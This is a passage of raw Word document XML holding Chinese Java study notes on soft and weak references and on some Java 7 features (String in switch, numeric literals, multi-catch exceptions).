          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SoftReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C334C9" w:rsidRDefault="00C334C9" w:rsidP="00C334C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SoftReference </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>类的一个典型用途就是用于内存敏感的高速缓存。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SoftReference </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的原理是：在保持对对象的引用时保证在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>报告内存不足情况之前将清除所有的软引用。关键之处在于，垃圾收集器在运行时可能会（也可能不会）释放软可及对象。对象是否被释放取决于垃圾收集器的算法 以及垃圾收集器运行时可用的内存数量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C334C9" w:rsidRDefault="00C334C9" w:rsidP="00C334C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>弱引用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WeakReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C334C9" w:rsidRDefault="00C334C9" w:rsidP="00C334C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WeakReference </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>类的一个典型用途就是规范化映射（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>canonicalized mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>）。另外，对于那些生存期相对较长而且重新创建的开销也不高的对象来说，弱引用也比较有用。关键之处在于，垃圾收集器运行时如果碰到了弱可及对象，将释放 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WeakReference </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>引用的对象。然而，请注意，垃圾收集器可能要运行多次才能找到并释放弱可及对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C334C9" w:rsidRPr="00C334C9" w:rsidRDefault="00C334C9" w:rsidP="00566207">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00566207" w:rsidRPr="00566207" w:rsidRDefault="00566207" w:rsidP="00E10795"/>
    <w:p w:rsidR="00566207" w:rsidRPr="00513432" w:rsidRDefault="00566207" w:rsidP="00E10795"/>
    <w:p w:rsidR="00DA285D" w:rsidRDefault="00DA285D" w:rsidP="00DA285D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00563FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00331098">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java7</w:t>
      </w:r>
      <w:r w:rsidR="00331098">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00331098">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java8</w:t>
      </w:r>
      <w:r w:rsidR="00331098">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA285D" w:rsidRDefault="00466EB9" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1. switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中增加对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类型的支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00466EB9" w:rsidRDefault="00466EB9" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>编译器在编译时先做处理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只有一种情况，直接转成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果只有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，则直接转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>if...else...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，先将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，然后对应的进行处理，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JavaCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在底层兼容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以前版本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00800BFA" w:rsidRDefault="00800BFA" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数字字面量的改进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00800BFA" w:rsidRPr="00001EF8" w:rsidRDefault="00800BFA" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001EF8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00001EF8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异常处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00001EF8">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>子句可以同时捕获多个异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40A00" w:rsidRPr="00C40A00" w:rsidRDefault="00C40A00" w:rsidP="00C40A00">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="271" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A00">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
